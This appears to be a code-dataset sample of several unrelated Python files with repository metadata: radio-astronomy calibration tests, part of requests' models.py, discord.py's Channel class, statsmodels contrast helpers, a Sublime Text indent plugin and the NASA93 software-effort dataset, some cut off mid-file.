self.assertTrue(sp.allclose(reformated, self.good_data))
class TestFoldOnCal(unittest.TestCase) :
def setUp(self):
self.ntime = 2048
self.nfreq = 10
self.data = sp.zeros((self.ntime, 4, self.nfreq))
self.n_bins_cal = 64
# Set channel dependant gain.
self.level = 0.1*(self.nfreq + sp.arange(self.nfreq))
# Add noise.
self.data[:,:,:] += (0.1 * self.level
* rand.randn(self.ntime, 4, self.nfreq))
# Add DC level.
self.dc = 10 * self.level
self.data += self.dc
        # First cal transition.
self.first_trans = rand.randint(0, self.n_bins_cal // 2)
# The following randomly assigns self.neg to -1 or 1.
self.neg = 0
while not self.neg: self.neg = rand.randint(-1, 2)
# First upward edge:
if self.neg == 1:
self.offset = self.first_trans
else:
self.offset = self.first_trans + self.n_bins_cal // 2
        self.data[:,0,:] += self.level
for ii in range(self.ntime//self.n_bins_cal) :
s = slice(self.first_trans + ii*self.n_bins_cal, self.first_trans +
(2*ii+1)*self.n_bins_cal//2)
self.data[s, 0, :] += self.neg * self.level
# Transition values and locations.
self.t_slice = slice(self.first_trans, sys.maxint, self.n_bins_cal//2)
self.t_vals = 0.5 + 0.1 * rand.randn(2*self.ntime//self.n_bins_cal,
self.nfreq)
self.t_vals *= - self.level
def test_runs(self) :
p2s.get_cal_mask(self.data, self.n_bins_cal)
def test_right_answer_basic(self) :
first_ind_on, n_blank = p2s.get_cal_mask(self.data, self.n_bins_cal)
self.assertEqual(first_ind_on, (self.offset + 1) % self.n_bins_cal)
self.assertEqual(n_blank, 2)
def test_right_answer_partial(self) :
self.data[self.t_slice, 0, :] += self.t_vals
first_ind_on, n_blank = p2s.get_cal_mask(self.data, self.n_bins_cal)
self.assertEqual(first_ind_on, (self.offset + 1) % self.n_bins_cal)
self.assertEqual(n_blank, 1)
def test_checks_cal_per(self) :
self.assertRaises(ValueError, p2s.get_cal_mask, self.data,
self.n_bins_cal + 1)
def test_fails_to_many_transitions(self) :
self.data[self.t_slice, 0, :] += self.t_vals
self.assertRaises(ce.DataError, p2s.get_cal_mask, self.data,
self.n_bins_cal*2)
self.assertRaises(ce.DataError, p2s.get_cal_mask, self.data,
self.n_bins_cal//2)
def test_fails_any_nan(self) :
self.data[self.t_slice,0,:] = float('nan')
self.assertRaises(ce.DataError, p2s.get_cal_mask, self.data,
self.n_bins_cal)
def test_fails_offs_in_ons(self) :
self.data[self.t_slice, 0, :] += self.t_vals
s = slice((self.offset + 7) % self.n_bins_cal, sys.maxint,
self.n_bins_cal)
self.data[s, :, :] = self.dc
self.assertRaises(ce.DataError, p2s.get_cal_mask, self.data,
self.n_bins_cal)
def test_fails_late_on(self) :
self.data[self.t_slice, 0, :] = self.dc
s = slice(self.offset+1, sys.maxint, self.n_bins_cal)
self.data[s, :, :] = self.dc
self.assertRaises(ce.DataError, p2s.get_cal_mask, self.data,
self.n_bins_cal)
def test_fails_to_many_semi_bins(self) :
self.data[self.t_slice, 0, :] += self.t_vals
s = slice((self.offset + 7) % self.n_bins_cal, sys.maxint,
self.n_bins_cal)
self.data[s, :, :] = self.dc + self.level * 0.7
self.assertRaises(ce.DataError, p2s.get_cal_mask, self.data,
self.n_bins_cal)
def test_fast_flagger(self):
for ii in range(self.ntime * self.nfreq * 4 // self.n_bins_cal // 10):
#for ii in range(3):
i_f = rand.randint(0, self.nfreq)
i_t = rand.randint(0, self.ntime)
i_p = rand.randint(0, 4)
self.data[i_t,i_p,i_f] += self.level[i_f] * 5
data, weights = p2s.separate_cal(self.data, self.n_bins_cal, flag=10)
right_answer = sp.empty((4, 2, self.nfreq))
right_answer[...] = self.dc
right_answer[0,0,:] += self.level
self.assertTrue(sp.allclose(data, right_answer, atol=self.level / 10))
self.assertTrue(sp.all(weights <= 1.))
kept_fraction = 1. - 4./self.n_bins_cal - (4./self.n_bins_cal/10)
self.assertTrue(sp.allclose(sp.mean(weights), kept_fraction, rtol=1e-3))
class TestSeparateCal(unittest.TestCase) :
"""Unlike the tests for get_cal_mask, these tests are tightly controled
with no noise so we can detect deviations from expected."""
def setUp(self) :
self.ntime = 2048
self.nfreq = 10
self.data = sp.zeros((self.ntime, 4, self.nfreq))
self.n_bins_cal = 64
self.offset = 10
def post_setup(self) :
if self.offset > self.n_bins_cal//2 :
last_on_start = (self.offset + self.n_bins_cal//2)% self.n_bins_cal
self.data[:last_on_start, :, :] = 1
for ii in range(self.ntime//self.n_bins_cal) :
s = slice(self.offset + ii*self.n_bins_cal, self.offset +
(2*ii+1)*self.n_bins_cal//2)
self.data[s, :, :] = 1
self.t_slice_on = slice(self.offset, sys.maxint, self.n_bins_cal)
self.t_slice_off = slice((self.offset +
self.n_bins_cal//2)%self.n_bins_cal,
sys.maxint, self.n_bins_cal)
def check_answer(self) :
data = self.data.copy()
outdata, weights = p2s.separate_cal(data, self.n_bins_cal, flag=-1)
self.assertTrue(sp.allclose(outdata[:,:,0,:], 1.0))
self.assertTrue(sp.allclose(outdata[:,:,1,:], 0.0))
data = self.data.copy()
outdata, weights = p2s.separate_cal(data, self.n_bins_cal, flag=10)
self.assertTrue(sp.allclose(outdata[:,:,0,:], 1.0))
self.assertTrue(sp.allclose(outdata[:,:,1,:], 0.0))
def test_works_no_transition(self) :
self.post_setup()
self.check_answer()
def test_works_transition(self) :
self.post_setup()
self.data[self.t_slice_off, :, :] = 0.3
self.data[self.t_slice_on, :, :] = 0.5
self.check_answer()
# Move the offset to the the second half and make sure it works.
def test_works_no_transition_late(self) :
self.offset = 57
self.post_setup()
        self.check_answer()
|
samabhi/pstHealth
|
venv/lib/python2.7/site-packages/requests/models.py
|
Python
|
mit
| 26,299 | 0.001711 |
# -*- coding: utf-8 -*-
"""
requests.models
~~~~~~~~~~~~~~~
This module contains the primary objects that power Requests.
"""
import os
from datetime import datetime
from .hooks import dispatch_hook, HOOKS
from .structures import CaseInsensitiveDict
from .status_codes import codes
from .auth import HTTPBasicAuth, HTTPProxyAuth
from .packages.urllib3.response import HTTPResponse
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3 import connectionpool, poolmanager
from .packages.urllib3.filepost import encode_multipart_formdata
from .defaults import SCHEMAS
from .exceptions import (
ConnectionError, HTTPError, RequestException, Timeout, TooManyRedirects,
URLRequired, SSLError, MissingSchema, InvalidSchema)
from .utils import (
get_encoding_from_headers, stream_untransfer, guess_filename, requote_uri,
dict_from_string, stream_decode_response_unicode, get_netrc_auth)
from .compat import (
urlparse, urlunparse, urljoin, urlsplit, urlencode, str, bytes,
SimpleCookie, is_py2)
# Import chardet if it is available.
try:
import chardet
except ImportError:
pass
REDIRECT_STATI = (codes.moved, codes.found, codes.other, codes.temporary_moved)
class Request(object):
"""The :class:`Request <Request>` object. It carries out all functionality of
Requests. Recommended interface is with the Requests functions.
"""
def __init__(self,
url=None,
headers=dict(),
files=None,
method=None,
data=dict(),
params=dict(),
auth=None,
cookies=None,
timeout=None,
redirect=False,
allow_redirects=False,
proxies=None,
hooks=None,
config=None,
_poolmanager=None,
verify=None,
session=None,
cert=None):
#: Dictionary of configurations for this request.
self.config = dict(config or [])
#: Float describes the timeout of the request.
# (Use socket.setdefaulttimeout() as fallback)
self.timeout = timeout
#: Request URL.
self.url = url
#: Dictionary of HTTP Headers to attach to the :class:`Request <Request>`.
self.headers = dict(headers or [])
#: Dictionary of files to multipart upload (``{filename: content}``).
self.files = files
#: HTTP Method to use.
self.method = method
#: Dictionary or byte of request body data to attach to the
#: :class:`Request <Request>`.
self.data = None
#: Dictionary or byte of querystring data to attach to the
#: :class:`Request <Request>`.
self.params = None
#: True if :class:`Request <Request>` is part of a redirect chain (disables history
#: and HTTPError storage).
self.redirect = redirect
        #: Set to True if full redirects are allowed (e.g. re-POST-ing of data at new ``Location``)
self.allow_redirects = allow_redirects
        # Dictionary mapping protocol to the URL of the proxy (e.g. {'http': 'foo.bar:3128'})
self.proxies = dict(proxies or [])
# If no proxies are given, allow configuration by environment variables
# HTTP_PROXY and HTTPS_PROXY.
if not self.proxies and self.config.get('trust_env'):
if 'HTTP_PROXY' in os.environ:
self.proxies['http'] = os.environ['HTTP_PROXY']
if 'HTTPS_PROXY' in os.environ:
self.proxies['https'] = os.environ['HTTPS_PROXY']
self.data, self._enc_data = self._encode_params(data)
self.params, self._enc_params = self._encode_params(params)
#: :class:`Response <Response>` instance, containing
#: content and metadata of HTTP Response, once :attr:`sent <send>`.
self.response = Response()
#: Authentication tuple or object to attach to :class:`Request <Request>`.
self.auth = auth
#: CookieJar to attach to :class:`Request <Request>`.
self.cookies = dict(cookies or [])
#: True if Request has been sent.
self.sent = False
#: Event-handling hooks.
self.hooks = {}
for event in HOOKS:
self.hooks[event] = []
hooks = hooks or {}
for (k, v) in list(hooks.items()):
self.register_hook(event=k, hook=v)
#: Session.
self.session = session
#: SSL Verification.
self.verify = verify
#: SSL Certificate
self.cert = cert
if headers:
headers = CaseInsensitiveDict(self.headers)
else:
headers = CaseInsensitiveDict()
# Add configured base headers.
for (k, v) in list(self.config.get('base_headers', {}).items()):
if k not in headers:
headers[k] = v
self.headers = headers
self._poolmanager = _poolmanager
def __repr__(self):
return '<Request [%s]>' % (self.method)
def _build_response(self, resp):
"""Build internal :class:`Response <Response>` object
from given response.
"""
def build(resp):
response = Response()
# Pass settings over.
response.config = self.config
if resp:
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', None))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
# Start off with our local cookies.
cookies = self.cookies or dict()
# Add new cookies from the server.
if 'set-cookie' in response.headers:
cookie_header = response.headers['set-cookie']
cookies = dict_from_string(cookie_header)
# Save cookies in Response.
response.cookies = cookies
# No exceptions were harmed in the making of this request.
response.error = getattr(resp, 'error', None)
# Save original response for later.
response.raw = resp
if isinstance(self.full_url, bytes):
response.url = self.full_url.decode('utf-8')
else:
response.url = self.full_url
return response
history = []
r = build(resp)
self.cookies.update(r.cookies)
if r.status_code in REDIRECT_STATI and not self.redirect:
while (('location' in r.headers) and
((r.status_code is codes.see_other) or (self.allow_redirects))):
r.content # Consume socket so it can be released
if not len(history) < self.config.get('max_redirects'):
raise TooManyRedirects()
# Release the connection back into the pool.
r.raw.release_conn()
history.append(r)
url = r.headers['location']
data = self.data
# Handle redirection without scheme (see: RFC 1808 Section 4)
if url.startswith('//'):
parsed_rurl = urlparse(r.url)
url = '%s:%s' % (parsed_rurl.scheme, url)
# Facilitate non-RFC2616-compliant 'location' headers
# (e.g. '/path/to/resource' instead of 'http://domain.tld/path/to/resource')
if not urlparse(url).netloc:
url = urljoin(r.url,
# Compliant with RFC3986, we percent
# encode the url.
requote_uri(url))
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.4
if r.status_code is codes.see_other:
method = 'GET'
data = None
|
jhgg/discord.py
|
discord/channel.py
|
Python
|
mit
| 12,385 | 0.001857 |
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-2016 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import copy
from . import utils
from .permissions import Permissions
from .enums import ChannelType
from collections import namedtuple
from .mixins import Hashable
from .role import Role
from .member import Member
Overwrites = namedtuple('Overwrites', 'id allow deny type')
PermissionOverwrite = namedtuple('PermissionOverwrite', 'allow deny')
class Channel(Hashable):
"""Represents a Discord server channel.
Supported Operations:
+-----------+---------------------------------------+
| Operation | Description |
+===========+=======================================+
| x == y | Checks if two channels are equal. |
+-----------+---------------------------------------+
| x != y | Checks if two channels are not equal. |
+-----------+---------------------------------------+
| hash(x) | Returns the channel's hash. |
+-----------+---------------------------------------+
| str(x) | Returns the channel's name. |
+-----------+---------------------------------------+
Attributes
-----------
name : str
The channel name.
server : :class:`Server`
The server the channel belongs to.
id : str
The channel ID.
topic : Optional[str]
The channel's topic. None if it doesn't exist.
is_private : bool
``True`` if the channel is a private channel (i.e. PM). ``False`` in this case.
position : int
The position in the channel list. This is a number that starts at 0. e.g. the
top channel is position 0. The position varies depending on being a voice channel
or a text channel, so a 0 position voice channel is on top of the voice channel
list.
type : :class:`ChannelType`
The channel type. There is a chance that the type will be ``str`` if
the channel type is not within the ones recognised by the enumerator.
    bitrate : int
The channel's preferred audio bitrate in bits per second.
voice_members
A list of :class:`Members` that are currently inside this voice channel.
If :attr:`type` is not :attr:`ChannelType.voice` then this is always an empty array.
user_limit : int
        The channel's limit for number of members that can be in a voice channel.
"""
__slots__ = [ 'voice_members', 'name', 'id', 'server', 'topic', 'position',
'is_private', 'type', 'bitrate', 'user_limit',
'_permission_overwrites' ]
def __init__(self, **kwargs):
self._update(**kwargs)
self.voice_members = []
def __str__(self):
return self.name
def _update(self, **kwargs):
self.name = kwargs.get('name')
self.server = kwargs.get('server')
self.id = kwargs.get('id')
self.topic = kwargs.get('topic')
self.is_private = False
self.position = kwargs.get('position')
self.bitrate = kwargs.get('bitrate')
self.type = kwargs.get('type')
self.user_limit = kwargs.get('user_limit')
try:
self.type = ChannelType(self.type)
except:
pass
self._permission_overwrites = []
everyone_index = 0
everyone_id = self.server.default_role.id
for index, overridden in enumerate(kwargs.get('permission_overwrites', [])):
overridden_id = overridden['id']
self._permission_overwrites.append(Overwrites(**overridden))
if overridden.get('type') == 'member':
continue
if overridden_id == everyone_id:
# the @everyone role is not guaranteed to be the first one
# in the list of permission overwrites, however the permission
# resolution code kind of requires that it is the first one in
# the list since it is special. So we need the index so we can
# swap it to be the first one.
everyone_index = index
# do the swap
tmp = self._permission_overwrites
if tmp:
tmp[everyone_index], tmp[0] = tmp[0], tmp[everyone_index]
@property
def changed_roles(self):
"""Returns a list of :class:`Roles` that have been overridden from
their default values in the :attr:`Server.roles` attribute."""
ret = []
for overwrite in filter(lambda o: o.type == 'role', self._permission_overwrites):
role = utils.get(self.server.roles, id=overwrite.id)
if role is None:
continue
role = copy.copy(role)
role.permissions.handle_overwrite(overwrite.allow, overwrite.deny)
ret.append(role)
return ret
@property
def is_default(self):
"""bool : Indicates if this is the default channel for the :class:`Server` it belongs to."""
return self.server.id == self.id
@property
def mention(self):
"""str : The string that allows you to mention the channel."""
return '<#{0.id}>'.format(self)
@property
def created_at(self):
"""Returns the channel's creation time in UTC."""
return utils.snowflake_time(self.id)
def overwrites_for(self, obj):
"""Returns a namedtuple that gives you the channel-specific overwrites
for a member or a role.
The named tuple is a tuple of (allow, deny) :class:`Permissions`
with the appropriately named entries.
Parameters
-----------
obj
The :class:`Role` or :class:`Member` or :class:`Object` denoting
whose overwrite to get.
"""
if isinstance(obj, Member):
predicate = lambda p: p.type == 'member'
elif isinstance(obj, Role):
predicate = lambda p: p.type == 'role'
else:
predicate = lambda p: True
for overwrite in filter(predicate, self._permission_overwrites):
if overwrite.id == obj.id:
return PermissionOverwrite(allow=Permissions(overwrite.allow),
deny=Permissions(overwrite.deny))
return PermissionOverwrite(allow=Permissions.none(), deny=Permissions.none())
def permissions_for(self, member):
"""Handles permission resolution for the current :class:`Member`.
This function takes into consideration the following cases:
- Server owner
- Server roles
- Channel overrides
- Member overrides
- Whether the channel is the default channel.
Parameters
----------
member : :class:`Member`
The member to resolve permissions for.
Returns
-------
:class:`Permissions`
The resolved permissions for the member.
"""
# The current cases can be explained as:
# Server owner get all permissions -- no questions asked. Otherwise...
# The @everyone role gets the first application.
# After that, the applied roles that the use
|
yarikoptic/pystatsmodels
|
statsmodels/sandbox/stats/contrast_tools.py
|
Python
|
bsd-3-clause
| 28,737 | 0.004941 |
'''functions to work with contrasts for multiple tests
contrast matrices for comparing all pairs, all levels to reference level, ...
extension to 2-way groups in progress
TwoWay: class for bringing two-way analysis together and try out
various helper functions
Idea for second part
- get all transformation matrices to move in between different full rank
parameterizations
- standardize to one parameterization to get all interesting effects.
- multivariate normal distribution
- exploit or expand what we have in LikelihoodResults, cov_params, f_test,
t_test, example: resols_dropf_full.cov_params(C2)
- connect to new multiple comparison for contrast matrices, based on
multivariate normal or t distribution (Hothorn, Bretz, Westfall)
'''
import numpy as np
#next 3 functions copied from multicomp.py
def contrast_allpairs(nm):
'''contrast or restriction matrix for all pairs of nm variables
Parameters
----------
nm : int
Returns
-------
contr : ndarray, 2d, (nm*(nm-1)/2, nm)
contrast matrix for all pairwise comparisons
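    Examples
    --------
    >>> contrast_allpairs(3)
    array([[ 1., -1.,  0.],
           [ 1.,  0., -1.],
           [ 0.,  1., -1.]])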
'''
contr = []
for i in range(nm):
for j in range(i+1, nm):
contr_row = np.zeros(nm)
contr_row[i] = 1
contr_row[j] = -1
contr.append(contr_row)
return np.array(contr)
def contrast_all_one(nm):
'''contrast or restriction matrix for all against first comparison
Parameters
----------
nm : int
Returns
-------
contr : ndarray, 2d, (nm-1, nm)
contrast matrix for all against first comparisons
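    Notes
    -----
    For nm=3 the two rows are [1, -1, 0] and [1, 0, -1] (each later level
    compared against the first level).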
'''
contr = np.column_stack((np.ones(nm-1), -np.eye(nm-1)))
return contr
def contrast_diff_mean(nm):
'''contrast or restriction matrix for all against mean comparison
Parameters
----------
nm : int
Returns
-------
contr : ndarray, 2d, (nm-1, nm)
contrast matrix for all against mean comparisons
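    Notes
    -----
    For nm=2 this is [[0.5, -0.5], [-0.5, 0.5]]: each level minus the mean.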
'''
return np.eye(nm) - np.ones((nm,nm))/nm
def signstr(x, noplus=False):
if x in [-1,0,1]:
if not noplus:
return '+' if np.sign(x)>=0 else '-'
else:
return '' if np.sign(x)>=0 else '-'
else:
return str(x)
def contrast_labels(contrasts, names, reverse=False):
if reverse:
sl = slice(None, None, -1)
else:
sl = slice(None)
labels = [''.join(['%s%s' % (signstr(c, noplus=True),v)
for c,v in zip(row, names)[sl] if c != 0])
for row in contrasts]
return labels
def contrast_product(names1, names2, intgroup1=None, intgroup2=None, pairs=False):
'''build contrast matrices for products of two categorical variables
this is an experimental script and should be converted to a class
Parameters
----------
names1, names2 : lists of strings
contains the list of level labels for each categorical variable
    intgroup1, intgroup2 : ndarrays (TODO: this part is not tested or finished yet)
categorical variable
Notes
-----
This creates a full rank matrix. It does not do all pairwise comparisons,
parameterization is using contrast_all_one to get differences with first
level.
? does contrast_all_pairs work as a plugin to get all pairs ?
'''
n1 = len(names1)
n2 = len(names2)
names_prod = ['%s_%s' % (i,j) for i in names1 for j in names2]
ee1 = np.zeros((1,n1))
ee1[0,0] = 1
if not pairs:
dd = np.r_[ee1, -contrast_all_one(n1)]
else:
dd = np.r_[ee1, -contrast_allpairs(n1)]
contrast_prod = np.kron(dd[1:], np.eye(n2))
names_contrast_prod0 = contrast_labels(contrast_prod, names_prod, reverse=True)
names_contrast_prod = [''.join(['%s%s' % (signstr(c, noplus=True),v)
                           for c,v in zip(row, names_prod)[::-1] if c != 0])
for row in contrast_prod]
ee2 = np.zeros((1,n2))
ee2[0,0] = 1
#dd2 = np.r_[ee2, -contrast_all_one(n2)]
if not pairs:
dd2 = np.r_[ee2, -contrast_all_one(n2)]
else:
dd2 = np.r_[ee2, -contrast_allpairs(n2)]
contrast_prod2 = np.kron(np.eye(n1), dd2[1:])
    names_contrast_prod2 = [''.join(['%s%s' % (signstr(c, noplus=True),v)
for c,v in zip(row, names_prod)[::-1] if c != 0])
for row in contrast_prod2]
    if (intgroup1 is not None) and (intgroup2 is not None):
d1, _ = dummy_1d(intgroup1)
d2, _ = dummy_1d(intgroup2)
dummy = dummy_product(d1, d2)
else:
dummy = None
return (names_prod, contrast_prod, names_contrast_prod,
contrast_prod2, names_contrast_prod2, dummy)
def dummy_1d(x, varname=None):
'''dummy variable for id integer groups
    Parameters
    ----------
x : ndarray, 1d
categorical variable, requires integers if varname is None
varname : string
name of the variable used in labels for category levels
Returns
-------
dummy : ndarray, 2d
array of dummy variables, one column for each level of the
category (full set)
labels : list of strings
labels for the columns, i.e. levels of each category
Notes
-----
    use tools.categorical instead for more options
See Also
--------
statsmodels.tools.categorical
Examples
--------
>>> x = np.array(['F', 'F', 'M', 'M', 'F', 'F', 'M', 'M', 'F', 'F', 'M', 'M'],
dtype='|S1')
>>> dummy_1d(x, varname='gender')
(array([[1, 0],
[1, 0],
[0, 1],
[0, 1],
[1, 0],
[1, 0],
[0, 1],
[0, 1],
[1, 0],
[1, 0],
[0, 1],
[0, 1]]), ['gender_F', 'gender_M'])
'''
if varname is None: #assumes integer
labels = ['level_%d' % i for i in range(x.max() + 1)]
return (x[:,None]==np.arange(x.max()+1)).astype(int), labels
else:
grouplabels = np.unique(x)
labels = [varname + '_%s' % str(i) for i in grouplabels]
return (x[:,None]==grouplabels).astype(int), labels
def dummy_product(d1, d2, method='full'):
'''dummy variable from product of two dummy variables
Parameters
----------
d1, d2 : ndarray
two dummy variables, assumes full set for methods 'drop-last'
and 'drop-first'
method : {'full', 'drop-last', 'drop-first'}
'full' returns the full product, encoding of intersection of
categories.
The drop methods provide a difference dummy encoding:
(constant, main effects, interaction effects). The first or last columns
of the dummy variable (i.e. levels) are dropped to get full rank
dummy matrix.
Returns
-------
dummy : ndarray
dummy variable for product, see method
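    Examples
    --------
    With d1 of shape (n, 2) and d2 of shape (n, 3), method='full' returns an
    (n, 6) array whose columns mark membership in each intersection cell.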
'''
if method == 'full':
dd = (d1[:,:,None]*d2[:,None,:]).reshape(d1.shape[0],-1)
elif method == 'drop-last': #same as SAS transreg
d12rl = dummy_product(d1[:,:-1], d2[:,:-1])
dd = np.column_stack((np.ones(d1.shape[0], int), d1[:,:-1], d2[:,:-1],d12rl))
#Note: dtype int should preserve dtype of d1 and d2
elif method == 'drop-first':
d12r = dummy_product(d1[:,1:], d2[:,1:])
dd = np.column_stack((np.ones(d1.shape[0], int), d1[:,1:], d2[:,1:],d12r))
else:
raise ValueError('method not recognized')
return dd
def dummy_limits(d):
'''start and endpoints of groups in a sorted dummy variable array
helper function for nested categories
Examples
--------
>>> d1 = np.array([[1, 0, 0],
[1, 0, 0],
[1, 0, 0],
[1, 0, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 0, 1],
[0, 0, 1],
[0, 0, 1],
[0, 0, 1]])
>>> dummy_limits(d1)
(array([0, 4, 8]), array([ 4, 8, 12]))
get group slices from an array
>>> [np.arange(d1.shape[0])[b:e]
|
Harrison-M/indent.txt-sublime
|
indentsublime.py
|
Python
|
mit
| 967 | 0.004137 |
import sublime, sublime_plugin
from indenttxt import indentparser
class IndentToList(sublime_plugin.TextCommand):
def run(self, edit):
parser = indentparser.IndentTxtParser()
#Get current selection
sels = self.view.sel()
selsParsed = 0
if(len(sels) > 0):
for sel in sels:
#Make sure selection isn't just a cursor
if(abs(sel.b - sel.a) > 0):
                    self.parseRegion(parser, sel, edit)
selsParsed += 1
#All selections just cursor marks?
if(selsParsed == 0):
region = sublime.Region(0, self.view.size() - 1)
self.parseRegion(parser, region, edit)
def parseRegion(self, parser, region, edit):
lines = self.view.line(region)
text = self.view.substr(lines)
indented = parser.parseText(text)
        newview = self.view.window().new_file()
newview.insert(edit, 0, indented)
|
rahlk/WarnPlan
|
warnplan/commons/tools/axe/nasa93.py
|
Python
|
mit
| 7,488 | 0.31437 |
"""
# The NASA93 Data Set
Standard header:
"""
from __future__ import division,print_function
import sys
sys.dont_write_bytecode = True
from lib import *
"""
data.dat:
"""
def nasa93():
vl=1;l=2;n=3;h=4;vh=5;xh=6
return data(indep= [
# 0..8
'Prec', 'Flex', 'Resl', 'Team', 'Pmat', 'rely', 'data.dat', 'cplx', 'ruse',
# 9 .. 17
'docu', 'time', 'stor', 'pvol', 'acap', 'pcap', 'pcon', 'aexp', 'plex',
# 18 .. 25
'ltex', 'tool', 'site', 'sced', 'kloc'],
less = ['effort', 'defects', 'months'],
_rows=[
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,25.9,117.6,808,15.3],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,24.6,117.6,767,15.0],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,7.7,31.2,240,10.1],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,8.2,36,256,10.4],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,9.7,25.2,302,11.0],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,2.2,8.4,69,6.6],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,3.5,10.8,109,7.8],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,66.6,352.8,2077,21.0],
[h,h,h,vh,h,h,l,h,n,n,xh,xh,l,h,h,n,h,n,h,h,n,n,7.5,72,226,13.6],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,vh,n,vh,n,h,n,n,n,20,72,566,14.4],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,h,n,vh,n,h,n,n,n,6,24,188,9.9],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,vh,n,vh,n,h,n,n,n,100,360,2832,25.2],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,n,n,vh,n,l,n,n,n,11.3,36,456,12.8],
[h,h,h,vh,n,n,l,h,n,n,n,n,h,h,h,n,h,l,vl,n,n,n,100,215,5434,30.1],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,h,n,vh,n,h,n,n,n,20,48,626,15.1],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,n,n,n,n,vl,n,n,n,100,360,4342,28.0],
[h,h,h,vh,n,n,l,h,n,n,n,xh,l,h,vh,n,vh,n,h,n,n,n,150,324,4868,32.5],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,h,n,h,n,h,n,n,n,31.5,60,986,17.6],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,h,n,vh,n,h,n,n,n,15,48,470,13.6],
[h,h,h,vh,n,n,l,h,n,n,n,xh,l,h,n,n,h,n,h,n,n,n,32.5,60,1276,20.8],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,19.7,60,614,13.9],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,66.6,300,2077,21.0],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,29.5,120,920,16.0],
[h,h,h,vh,n,h,n,n,n,n,h,n,n,n,h,n,h,n,n,n,n,n,15,90,575,15.2],
[h,h,h,vh,n,h,n,h,n,n,n,n,n,n,h,n,h,n,n,n,n,n,38,210,1553,21.3],
[h,h,h,vh,n,n,n,n,n,n,n,n,n,n,h,n,h,n,n,n,n,n,10,48,427,12.4],
[h,h,h,vh,h,n,vh,h,n,n,vh,vh,l,vh,n,n,h,l,h,n,n,l,15.4,70,765,14.5],
[h,h,h,vh,h,n,vh,h,n,n,vh,vh,l,vh,n,n,h,l,h,n,n,l,48.5,239,2409,21.4],
[h,h,h,vh,h,n,vh,h,n,n,vh,vh,l,vh,n,n,h,l,h,n,n,l,16.3,82,810,14.8],
[h,h,h,vh,h,n,vh,h,n,n,vh,vh,l,vh,n,n,h,l,h,n,n,l,12.8,62,636,13.6],
[h,h,h,vh,h,n,vh,h,n,n,vh,vh,l,vh,n,n,h,l,h,n,n,l,32.6,170,1619,18.7],
[h,h,h,vh,h,n,vh,h,n,n,vh,vh,l,vh,n,n,h,l,h,n,n,l,35.5,192,1763,19.3],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,5.5,18,172,9.1],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,10.4,50,324,11.2],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,14,60,437,12.4],
[h,h,h,vh,n,h,n,h,n,n,n,n,n,n,n,n,n,n,n,n,n,n,6.5,42,290,12.0],
[h,h,h,vh,n,n,n,h,n,n,n,n,n,n,n,n,n,n,n,n,n,n,13,60,683,14.8],
[h,h,h,vh,h,n,n,h,n,n,n,n,n,n,h,n,n,n,h,h,n,n,90,444,3343,26.7],
[h,h,h,vh,n,n,n,h,n,n,n,n,n,n,n,n,n,n,n,n,n,n,8,42,420,12.5],
[h,h,h,vh,n,n,n,h,n,n,h,n,n,n,n,n,n,n,n,n,n,n,16,114,887,16.4],
[h,h,h,vh,h,n,h,h,n,n,vh,h,l,h,h,n,n,l,h,n,n,l,177.9,1248,7998,31.5],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,h,n,n,n,n,n,n,n,302,2400,8543,38.4],
